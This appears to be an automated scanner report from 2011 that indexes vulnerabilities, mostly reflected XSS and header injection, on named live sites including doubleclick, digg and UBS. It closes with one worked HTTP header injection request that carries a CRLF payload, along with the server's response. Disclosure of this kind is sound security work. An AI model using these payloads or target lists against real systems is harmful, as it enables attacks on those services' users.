XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

Report generated by XSS.CX at Sat Jul 09 06:00:32 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search


1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]

2.7. http://adonmax.com/afr.php [campaignid parameter]

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]

2.10. http://api.mixpanel.com/track/ [callback parameter]

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]

2.19. http://digg.com/login [REST URL parameter 1]

2.20. http://digg.com/register [REST URL parameter 1]

2.21. http://digg.com/search [REST URL parameter 1]

2.22. http://digg.com/submit [REST URL parameter 1]

2.23. http://digg.com/topic [REST URL parameter 1]

2.24. http://digg.com/upcoming [REST URL parameter 1]

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.64. http://jqueryui.com/themeroller/ [fcError parameter]

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

3. Flash cross-domain policy

3.1. http://ad.doubleclick.net/crossdomain.xml

3.2. http://adx.adnxs.com/crossdomain.xml

3.3. http://bp.specificclick.net/crossdomain.xml

3.4. http://core.insightexpressai.com/crossdomain.xml

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml

3.6. http://idcs.interclick.com/crossdomain.xml

3.7. http://rs.gwallet.com/crossdomain.xml

3.8. http://bstats.adbrite.com/crossdomain.xml

3.9. http://cdn.stumble-upon.com/crossdomain.xml

3.10. http://feeds.bbci.co.uk/crossdomain.xml

3.11. http://googleads.g.doubleclick.net/crossdomain.xml

3.12. http://newsrss.bbc.co.uk/crossdomain.xml

3.13. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

4.3. http://profile.live.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://digg.com/

5.2. http://digg.com/login

5.3. http://digg.com/login

5.4. http://digg.com/register

5.5. http://digg.com/register

5.6. http://digg.com/search

5.7. http://digg.com/submit

5.8. http://digg.com/topic

5.9. http://digg.com/upcoming

5.10. http://manage.softlayer.mobi/

6. SSL cookie without secure flag set

6.1. https://accountservices.passport.net/gethip.srf

6.2. https://ebanking.ubs.com/en/

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx

6.4. https://live.zune.net/xweb/passport/rightCB.aspx

6.5. https://live.zune.net/xweb/passport/topCB.aspx

6.6. https://login.live.com/login.srf

6.7. https://login.live.com/pp1100/

6.8. https://login.live.com/ppsecure/post.srf

6.9. https://login.live.com/ppsecure/secure.srf

6.10. https://login.live.com/resetpw.srf

6.11. https://msnia.login.live.com/ppsecure/post.srf

6.12. https://quotes-public.ubs.com/

7. Session token in URL

7.1. https://manage.softlayer.com/

7.2. https://manage.softlayer.com/Sales/orderComputingInstance

7.3. https://manage.softlayer.com/index/index

8. Password field submitted using GET method

8.1. http://digg.com/

8.2. http://digg.com/login

8.3. http://digg.com/register

8.4. http://digg.com/search

8.5. http://digg.com/submit

8.6. http://digg.com/topic

8.7. http://digg.com/upcoming

9. Cookie scoped to parent domain

9.1. https://accountservices.passport.net/gethip.srf

9.2. http://api.twitter.com/1/statuses/user_timeline.json

9.3. http://c.microsoft.com/trans_pixel.aspx

9.4. http://ads.revsci.net/adserver/ako

9.5. http://ads.revsci.net/adserver/ako

9.6. http://adx.adnxs.com/mapuid

9.7. http://b.scorecardresearch.com/b

9.8. http://b.scorecardresearch.com/p

9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0

9.12. http://cang.baidu.com/do/add

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/

9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

9.15. https://ebanking.ubs.com/en/

9.16. http://ib.adnxs.com/seg

9.17. http://idcs.interclick.com/Segment.aspx

9.18. http://js.revsci.net/gateway/gw.js

9.19. http://leadback.advertising.com/adcedge/lb

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx

9.21. https://live.zune.net/xweb/passport/rightCB.aspx

9.22. https://live.zune.net/xweb/passport/topCB.aspx

9.23. http://m.adnxs.com/msftcookiehandler

9.24. https://msnia.login.live.com/ppsecure/post.srf

9.25. http://p.brilig.com/contact/bct

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302

9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

9.30. http://pixel.quantserve.com/pixel

9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

9.32. http://profile.live.com/badge/

9.33. https://quotes-public.ubs.com/

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

9.39. http://r.turn.com/r/beacon

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.41. http://rs.gwallet.com/r1/pixel/x1094

9.42. http://rs.gwallet.com/r1/pixel/x1225

9.43. http://rs.gwallet.com/r1/pixel/x368

9.44. http://rs.gwallet.com/r1/pixel/x369

10. Cookie without HttpOnly flag set

10.1. http://about.digg.com/

10.2. http://about.digg.com/ads

10.3. http://about.digg.com/blog

10.4. http://about.digg.com/contact

10.5. http://about.digg.com/faq

10.6. http://about.digg.com/partnership

10.7. http://about.digg.com/privacy

10.8. http://about.digg.com/terms-use

10.9. https://accountservices.passport.net/gethip.srf

10.10. http://c.microsoft.com/trans_pixel.aspx

10.11. http://developers.digg.com/

10.12. http://jobs.digg.com/

10.13. http://knowledgelayer.softlayer.com/

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

10.15. https://nae.ubs.com/quotes

10.16. https://nae.ubs.com/quotes/markets_instruments

10.17. http://ping.fm/ref/

10.18. http://ad.yieldmanager.com/pixel

10.19. http://adonmax.com/afr.php

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://b.scorecardresearch.com/b

10.23. http://b.scorecardresearch.com/p

10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.26. http://bstats.adbrite.com/adserver/behavioral-data/0

10.27. http://cang.baidu.com/do/add

10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/

10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

10.30. http://delicious.com/save

10.31. http://digg.com/

10.32. http://digg.com/upcoming

10.33. http://friendfeed.com/share

10.34. http://idcs.interclick.com/Segment.aspx

10.35. http://js.revsci.net/gateway/gw.js

10.36. http://leadback.advertising.com/adcedge/lb

10.37. https://live.zune.net/xweb/passport/bottomCB.aspx

10.38. https://live.zune.net/xweb/passport/rightCB.aspx

10.39. https://live.zune.net/xweb/passport/topCB.aspx

10.40. https://login.live.com/login.srf

10.41. https://login.live.com/pp1100/

10.42. https://login.live.com/ppsecure/post.srf

10.43. https://login.live.com/ppsecure/secure.srf

10.44. https://login.live.com/resetpw.srf

10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

10.49. https://msnia.login.live.com/ppsecure/post.srf

10.50. http://p.brilig.com/contact/bct

10.51. http://pinpoint.microsoft.com/en-US/Default.aspx

10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302

10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

10.56. http://pixel.quantserve.com/pixel

10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

10.58. http://profile.live.com/badge/

10.59. http://promote.orkut.com/preview

10.60. https://quotes-public.ubs.com/

10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/

10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi

10.68. http://r.turn.com/r/beacon

10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

10.70. http://rs.gwallet.com/r1/pixel/x1094

10.71. http://rs.gwallet.com/r1/pixel/x1225

10.72. http://rs.gwallet.com/r1/pixel/x368

10.73. http://rs.gwallet.com/r1/pixel/x369

11. Password field with autocomplete enabled

11.1. https://clientlogin.ibb.ubs.com/login

11.2. http://digg.com/

11.3. http://digg.com/login

11.4. http://digg.com/login

11.5. http://digg.com/register

11.6. http://digg.com/register

11.7. http://digg.com/search

11.8. http://digg.com/submit

11.9. http://digg.com/submit

11.10. http://digg.com/submit

11.11. http://digg.com/topic

11.12. http://digg.com/upcoming

11.13. https://foton-ewm-es.ubs.com/safe-login/Login

11.14. https://fundgate.ubs.com/GIS/Default.aspx

11.15. https://manage.softlayer.com/

11.16. https://manage.softlayer.com/Sales/orderComputingInstance

11.17. https://manage.softlayer.com/index/index

11.18. http://manage.softlayer.mobi/

11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

12. Source code disclosure

13. Referer-dependent response

14. Cross-domain POST

14.1. https://accountservices.passport.net/uiresetpw.srf

14.2. https://blog.metricstream.com/

14.3. https://login.live.com/resetpw.srf

14.4. https://login.live.com/resetpw.srf

15. Cross-domain Referer leakage

15.1. https://accountservices.passport.net/gethip.srf

15.2. https://accountservices.passport.net/uiresetpw.srf

15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

15.4. http://ad.doubleclick.net/adj/bzj.techflash/

15.5. http://ad.doubleclick.net/adj/bzj.techflash/

15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.8. http://adonmax.com/afr.php

15.9. http://bcp.crwdcntrl.net/px

15.10. http://bp.specificclick.net/

15.11. http://cm.g.doubleclick.net/pixel

15.12. http://cm.g.doubleclick.net/pixel

15.13. http://digg.com/submit

15.14. http://go.microsoft.com/fwlink/

15.15. http://googleads.g.doubleclick.net/pagead/ads

15.16. http://jqueryui.com/themeroller/

15.17. http://live.zune.net/signin.ashx

15.18. http://live.zune.net/signin.ashx

15.19. http://live.zune.net/signin.ashx

15.20. https://login.live.com/login.srf

15.21. https://login.live.com/ppsecure/post.srf

15.22. http://p.brilig.com/contact/bct

15.23. http://pinpoint.microsoft.com/en-US/Default.aspx

15.24. http://promote.orkut.com/preview

15.25. http://pubads.g.doubleclick.net/gampad/ads

15.26. http://pubads.g.doubleclick.net/gampad/ads

15.27. http://pubads.g.doubleclick.net/gampad/ads

15.28. http://s.bebo.com/c/site/index20_script.js

15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js

16. Cross-domain script include

16.1. http://about.digg.com/

16.2. http://about.digg.com/ads

16.3. http://about.digg.com/blog

16.4. http://about.digg.com/contact

16.5. http://about.digg.com/faq

16.6. http://about.digg.com/partnership

16.7. http://about.digg.com/privacy

16.8. http://about.digg.com/terms-use

16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

16.10. http://analytics.microsoft.com/Sync.html

16.11. http://analytics.msn.com/Include.html

16.12. http://bcp.crwdcntrl.net/px

16.13. https://blog.metricstream.com/

16.14. http://blog.softlayer.com/

16.15. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

16.16. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

16.17. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

16.18. http://developers.digg.com/

16.19. http://digg.com/

16.20. http://digg.com/login

16.21. http://digg.com/register

16.22. http://digg.com/search

16.23. http://digg.com/submit

16.24. http://digg.com/topic

16.25. http://digg.com/upcoming

16.26. http://docs.jquery.com/Tutorials:Introducing_$(document

16.27. http://docs.jquery.com/UI

16.28. http://docs.jquery.com/UI/Accordion

16.29. http://docs.jquery.com/UI/Effects/

16.30. http://docs.jquery.com/UI/Effects/Slide

16.31. http://googleads.g.doubleclick.net/pagead/ads

16.32. http://jobs.digg.com/

16.33. http://jquery.com/

16.34. http://jquery.malsup.com/cycle/

16.35. http://jqueryui.com/about

16.36. http://jqueryui.com/themeroller/

16.37. http://malsup.com/jquery/cycle/

16.38. http://medienfreunde.com/lab/innerfade/

16.39. http://pubads.g.doubleclick.net/gampad/ads

16.40. http://pubads.g.doubleclick.net/gampad/ads

17. TRACE method is enabled

17.1. http://bp.specificclick.net/

17.2. http://cdn1.diggstatic.com/

17.3. http://crl.globalsign.net/

17.4. http://digg.com/

18. Email addresses disclosed

18.1. http://about.digg.com/privacy

18.2. http://about.digg.com/terms-use

18.3. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

18.5. http://bstats.adbrite.com/adserver/behavioral-data/0

18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js

18.7. https://foton-ewm-es.ubs.com/safe-login/Login

18.8. http://jqueryui.com/about

18.9. https://login.live.com/login.srf

18.10. https://login.live.com/pp1100/

18.11. https://login.live.com/ppsecure/post.srf

18.12. https://login.live.com/ppsecure/secure.srf

18.13. https://manage.softlayer.com/

18.14. https://manage.softlayer.com/Sales/orderComputingInstance

18.15. https://manage.softlayer.com/index/index

18.16. https://msnia.login.live.com/ppsecure/post.srf

18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna

18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js

19. Private IP addresses disclosed

19.1. http://digg.com/

19.2. http://digg.com/ajax/submit/crawl

19.3. http://digg.com/login

19.4. http://digg.com/register

19.5. http://digg.com/search

19.6. http://digg.com/submit

19.7. http://digg.com/submit

19.8. http://digg.com/submit

19.9. http://digg.com/submit

19.10. http://digg.com/topic

19.11. http://digg.com/upcoming

20. Credit card numbers disclosed

21. Robots.txt file

21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

21.2. http://api.twitter.com/receiver.html

21.3. http://cdn.stumble-upon.com/css/global_su.css

21.4. http://crl.globalsign.net/Root.crl

21.5. http://digg.com/submit

21.6. http://feeds.bbci.co.uk/news/rss.xml

21.7. http://googleads.g.doubleclick.net/pagead/ads

21.8. https://login.live.com/login.srf

21.9. https://manage.softlayer.com/Sales/orderComputingInstance

21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

21.11. http://profile.live.com/badge/

22. Cacheable HTTPS response

22.1. https://blog.metricstream.com/

22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html

22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html

22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html

22.5. https://live.zune.net/xweb/passport/leftCB.aspx

22.6. https://login.live.com/pp1100/RDHelper_JS.srf

22.7. https://manage.softlayer.com/

22.8. https://manage.softlayer.com/Sales/orderComputingInstance

22.9. https://manage.softlayer.com/favicon.ico

22.10. https://manage.softlayer.com/index/index

22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.13. https://nae.ubs.com/favicon.ico

22.14. https://onesource.ubs.com/

22.15. https://onlineservices.ubs.com/

22.16. https://onlineservices.ubs.com/favicon.ico

22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

23. HTML does not specify charset

23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

23.2. http://analytics.microsoft.com/Sync.html

23.3. http://analytics.msn.com/Include.html

23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.5. https://fundgate.ubs.com/GIS/Default.aspx

23.6. http://jqueryui.com/about

23.7. http://jqueryui.com/themeroller/

23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

23.9. https://nae.ubs.com/quotes

23.10. https://nae.ubs.com/quotes/markets_instruments

23.11. https://onesource.ubs.com/

23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

23.13. http://p.brilig.com/contact/bct

23.14. http://pixel.invitemedia.com/data_sync

24. HTML uses unrecognised charset

24.1. http://adonmax.com/afr.php

24.2. http://cang.baidu.com/do/add

25. Content type incorrectly stated

25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

25.3. https://accountservices.passport.net/gethip.srf

25.4. http://api.mixpanel.com/track/

25.5. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.7. https://login.live.com/pp1100/RDHelper_JS.srf

25.8. https://manage.softlayer.com/favicon.ico

25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

25.11. https://nae.ubs.com/favicon.ico

25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js

26. Content type is not specified

26.1. https://ebanking-us.ubs.com/safeloginu/Login

26.2. https://foton-ewm-de.ubs.com/safe-login/Login

26.3. https://foton-ewm-es.ubs.com/safe-login/Login

26.4. https://login.live.com/hiphelp.srf

27. SSL certificate

27.1. https://clientlogin.ibb.ubs.com/

27.2. https://login.live.com/

27.3. https://manage.softlayer.com/

27.4. https://onlineservices.ubs.com/



1. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/bzj.techflash/home_page

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49448%0d%0a875587022d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49448%0d%0a875587022d3/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49448
875587022d3
/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820:
